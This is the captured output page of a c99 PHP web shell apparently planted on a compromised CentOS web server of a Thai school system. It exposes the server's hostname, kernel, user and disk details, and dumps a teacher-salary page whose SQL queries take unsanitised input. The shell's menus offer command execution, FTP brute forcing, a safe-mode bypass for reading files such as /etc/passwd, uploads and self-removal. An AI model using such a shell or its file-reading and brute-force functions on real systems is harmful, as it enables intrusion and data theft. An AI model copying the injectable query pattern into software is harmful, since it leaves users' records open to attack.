!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/   drwxr-xr-x
Free 52.82 GB of 127.8 GB (41.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     MonyByYear_bkp.php (7.27 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
session_start
();

 if (
session_is_registered("valid_user") && session_is_registered("Priority") )
 {
include(
"../include/FunctionDB.php");
include(
"admin_menu.php");
 
ConnectDB();
$Username $valid_user;
$sql"SELECT * FROM personal_tb  WHERE  Username='$Username'";
$resmysql_query($sql);
$rs mysql_fetch_array($res);
$strSQL "SELECT * FROM  salary_repot_tb  Where  Teacher_code='$Teacher_code'  GROUP By  Start_year    ";
$result mysql_query($strSQL); 
$num mysql_num_rows($result);
?>
<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">
<style type="text/css">
<!--
.style14 {color: #000000}
.style15 {font-size: 14px}
-->
</style>
<table width="807" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td width="807"><br>
          <fieldset>
            <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="menu_teacher.php " >หน้าหลัก</a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"><a href="Menu_History.php?Teacher_code=<? echo $rs[Teacher_code?>">ข้อมูลประวัติส่วนตัว</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /><a href="Show_Moy_History.php?Teacher_code=<? echo $rs[Teacher_code?>">แสดงข้อมูลเงินเดือนทั้งหมด</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /><a href="Add_His_Absent.php?Teacher_code=<? echo $rs[Teacher_code?>">เพิ่มวันลา</a></font></legend>
            <label><div align="center">
              <form id="form1" name="form1" method="post" action="">
                <div align="left"><font size="2" face="Tahoma"><img src="../picture/previous.gif" onclick="window.history.back()"  width="85" height="22" border="0" /></font>
                </div>
                <table width="59%" border="0" align="center" cellpadding="0" cellspacing="1" style=" border:0px solid gray"size="12">
                  <tr>
                    <td height="25" bgcolor="#FFFFFF">&nbsp;</td>
                  </tr>
                  
                  <tr>
                    <td height="43" ><table width="97%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" style="background-color:#eeeeee; border:0px solid gray"size="12">
                      <tr>
                        <td height="25" colspan="4" bgcolor="#FFFFFF"><div align="center"><font color="#993333" face="Tahoma"><span class="style15">แสดงข้อมูลเงินเดือนลารายป</span></font><font color="#993333" size="4" face="Tahoma">ี </font><font size="2" face="Tahoma">อ.<font color="#993333"><strong><? echo $rs['Teacher_name'?> &nbsp;<? echo $rs['Teacher_lastname'?></strong></font></font></div></td>
                      </tr>
                      <tr bgcolor="#CCCCCC">
                        <td colspan="3" bordercolor="#999966" bgcolor="#FFFFFF" style="border:0px solid gray">&nbsp;</td>
                        <td bordercolor="#999966" bgcolor="#FFFFFF" style="border:0px solid gray">&nbsp;</td>
                      </tr>
                      <tr bgcolor="#CCCCCC">
                        <td colspan="3" bordercolor="#999966" bgcolor="#FFFFFF" style="border:0px solid gray"><div align="left"><font size="2" face="Tahoma">ปีงบประมาณ</font></div></td>
                        <td width="32%" bordercolor="#999966" bgcolor="#FFFFFF" style="border:0px solid gray"><div align="center"><font size="2" face="Tahoma">จำนวนรายการทั้งหมด</font></div></td>
                      </tr>
                      <?php
$i 
1;
 while(
$row mysql_fetch_array($result))
 {

     if(
$count==0)
     {
?>
                      <tr >
                        <td width="6%" align="center" bgcolor="#FFFFFF" ></strong></td>
                        <td width="6%" align="center" bgcolor="#FFFFFF" ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><img src="../picture/linesub.gif" width="16" height="16" border="0" align="absmiddle" /></font></td>
                        <td width="56%" align="center" bgcolor="#FFFFFF" ><div align="left"><font color="#990099" size="2" face="Tahoma"><a href="MonyList.php?Teacher_code=<?=$row["Teacher_code"]?>&amp;Start_year=<?=$row["Start_year"]?>"title="Click to see Detail" class="d">
                          <?=$row["Start_year"]?>
                        </a></font></div>
                        </font></td>
                        <td align="center" bgcolor="#FFFFFF" ><font color="#996600" size="2" face="Tahoma">
                          <?php
    $Start_year 
$row[Start_year];
    
$sql1 "Select * From    salary_repot_tb    Where   Teacher_code='$Teacher_code'  and  Start_year='$Start_year'  ";
    
$result1 mysql_query($sql1);
    
$countnum mysql_num_rows($result1);
     echo 
$countnum;
    echo
"$rc2  <font face=\"Tahoma\" Size=\"2\" color=\"#000000\">ระเบียน</font>";
     echo
"</font>";
    
?>
                        </font></strong></td>
                      </tr>
                      <?
    $count
=1;
     }
else
{
?>
                      <tr>
                        <td align="center" bordercolor="#999966" bgcolor="#FFFFFF" ></strong></td>
                        <td align="center" bgcolor="#FFFFFF" ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><img src="../picture/linesub.gif" width="16" height="16" border="0" align="absmiddle" /></font></td>
                        <td height="18" align="center" bgcolor="#FFFFFF" ><div align="left"><font color="#990099" size="2" face="Tahoma"><a href="MonyList.php?Teacher_code=<?=$row["Teacher_code"]?>&amp;Start_year=<?=$row["Start_year"]?>"title="Click to see Detail" class="d">
                          <?=$row["Start_year"]?>
                        </a><a href="AbsentByAbsent.php?Start_year=<?=$row["Start_year"]?>&amp;Teacher_code=<?=$row["Teacher_code"]?> "title="Click to see Detail" class="d"></a></a></font></div>
                        </strong></td>
                        <td align="center" bgcolor="#FFFFFF" ><font color="#996600" size="2" face="Tahoma">
                          <?php
    $Start_year 
$row[Start_year];
    
$sql1 "Select * From salary_repot_tb  Where  Start_year='$Start_year' and  Teacher_code='$Teacher_code' ";
    
$result1 mysql_query($sql1);
    
$countnum mysql_num_rows($result1);
     echo 
$countnum;
    echo
"$rc2  <font face=\"Tahoma\" Size=\"2\" color=\"#000000\">ระเบียน</font>";
     echo
"</font>";
    
?>
                        </font></strong></td>
                      </tr>
                      <?
$count
=0;
}
$i++;
 }    

?>
                      <tr>
                        <td height="25" colspan="4" align="center" bgcolor="#FFFFFF"><div align="center"><strong><font color="#000000" size="2" face="Tahoma">ทั้งหมด</font><font color="#993333" size="2" face="Tahoma"> <? echo $num ?></font><font color="#000000" size="2" face="Tahoma"> ปี</font></strong></div></td>
                      </tr>
                    </table></td>
                  </tr>
                </table>
              </form>
              </div>
            </label>
        </fieldset><br>
        <font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2"><b>หมายเหตุ :</b> ใช้เมาส์คลิกที่ชื่อ<br>
      </font></td>
    </tr>
</table>
<?php 
    
}
else
{
       echo
"<meta http-equiv=\"refresh\" content=\"3;URL=../login.php\">\n";
       echo
"Please Login ";
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0108 ]--